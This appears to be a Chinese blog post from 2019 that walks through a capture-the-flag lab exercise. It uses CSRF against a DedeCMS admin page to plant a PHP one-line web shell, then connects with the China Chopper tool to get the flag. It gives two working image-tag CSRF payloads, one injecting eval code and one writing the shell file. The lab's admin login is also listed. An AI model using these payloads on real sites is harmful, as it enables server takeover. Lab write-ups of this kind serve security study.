CSRF跨站请求伪造

CSRF跨站请求伪造作业
首先我们梳理一下csrf的过程,有一个A站(受攻击站),B站(我们伪造的恶意站点),受害者在浏览器打开了A站,浏览器记录了A站的cookie,而且我们没有关闭A站,回话持续生效,cookie也持续生效;然后我们打开了恶意网站B,浏览器加载恶意网站B,里面有请求加载A站的连接,浏览器不知道是用户发出的还是恶意网站B发出的(其实是B网站发出的)浏览器没有意识,它就执行了这个请求(以及连接请求后的一系列参数),并且附带A站的cookie去与A站服务器交互,A站服务器一看cookie没错,允许交互,攻击就形成了。

在本次靶场实战中,我们由于自己缺乏服务器,由自己扮演受害者(我打我自己)访问想要在恶意网站中添加的两条语句(一句话木马,获得getshell),其实这个过程是浏览器该干的—-菜刀连接进入服务器拿到flag。

首先我们进入靶场:http://59.63.200.79:8010/csrf/uploads/
使用工具:中国菜刀
找到靶场后台登录地址:我们可以使用御剑扫描或者复制cms版本号,找到没有修改的


版本号。


上谷歌语法。

找到后台路径为:http://59.63.200.79:8010/csrf/uploads/dede/login.php?gotopage=%2Fcsrf%2Fuploads%2Fdede%2Fsys_verifies.php


扮演受害管理员:我们登录(admin/admin123)


进入,在不关闭的情况下执行两条语句,以url形式传参,正常的话是要放入伪造站点以图片加载形式传参的:
<img src="http://59.63.200.79:8010/csrf/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\%22;eval($_GET[a]);die();//">


执行第一条。
<img src="http://59.63.200.79:8010/csrf/uploads/dede/sys_verifies.php?action=down&a=$a='<?php @eval($_POST[\'a\'])?>';file_put_contents('qiuzhiyu.php',$a);echo 'ok!';">


执行第二句。

然后菜刀连接:


进入:


获得flag.

posted @ 2019-10-21 21:31  求知鱼  阅读(291)  评论(0)    收藏  举报